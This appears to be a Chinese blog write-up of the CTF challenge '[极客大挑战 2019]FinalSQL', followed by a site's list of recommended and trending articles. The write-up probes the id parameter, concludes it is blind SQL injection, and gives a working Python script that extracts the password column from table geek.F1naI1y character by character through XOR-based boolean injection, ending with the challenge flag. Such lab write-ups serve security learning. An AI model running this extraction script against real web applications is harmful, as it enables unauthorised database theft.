[极客大挑战 2019]FinalSQL1

worker..2024-08-10 18:24

打开题目

sql注入,点击1试一下

点击2试一下

点击3试一下

点击4

点击5

id=6试一下

感觉是sql盲注了

编写脚本

import requests

import string

from time import sleep

url = "http://9da9cb18-3096-413a-9476-8a177ffec31a.node4.buuoj.cn:81/search.php?id=0\^({})"

如果为真时的关键字匹配

base = 'Click others'

盲注的字符集

chars = string.printable

inject = "ord(substr(reverse((SELECT(GROUP_CONCAT(password))FROM(geek.F1naI1y))),{},1))={}"

for i in range(1, 1000):

continue_ = False

for c in chars:

u = url.format(inject.format(i,ord(c)))

res = requests.get(u)

while res.status_code == 429:

sleep(1)

res = requests.get(u)

if base in res.text:

print(c,end='',flush=True)

continue_ = True

break

if not continue_:

break(参考博客)

得到flag倒序,更正为

得到flag

flag{87c0b617-4e80-4135-b08c-ad013c856e27}

相关推荐
Ashley_Amanda13 小时前
SAP ABAP 开发全攻略:从核心编程到最佳实践
大数据·数据库·sql
罗政14 小时前
mybatis-plus插件解决sql报错:this is incompatible with sql_mode=only_full_group_by ”
数据库·sql·mybatis
rannn_11114 小时前
【SQL题解】力扣高频 SQL 50题|DAY4
数据库·后端·sql·leetcode·题解
卓豪终端管理15 小时前
每周5小时“隐形流失”,如何精准锁定并回收?
网络·安全·web安全
青石路15 小时前
用了MySQL的INSERT ON DUPLICATE KEY UPDATE,怎么还报唯一索引冲突错误
后端·sql·mysql
Ahuuua15 小时前
Spring 事务传播行为详解
数据库·sql·spring
IvanCodes15 小时前
openGauss 核心体系架构深度解析
数据库·sql·postgresql·openguass
李白你好15 小时前
Burp Suite 插件 | SQL 注入自定义扫描和分析
sql
尋有緣16 小时前
力扣1225-报告系统状态的连续日期
数据库·sql·算法·leetcode·oracle
无名-CODING16 小时前
MyBatis 动态 SQL 全攻略
数据库·sql·mybatis
热门推荐
01GitHub 镜像站点02从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击03UV安装并设置国内源04Linux下V2Ray安装配置指南05Gemini3 生成的基于手势控制3D粒子圣诞树06在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)07Labelme从安装到标注:零基础完整指南08解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题09GLM-4.7 vs MiniMax-M2.1:代码工程理解10CentOS的ISO镜像下载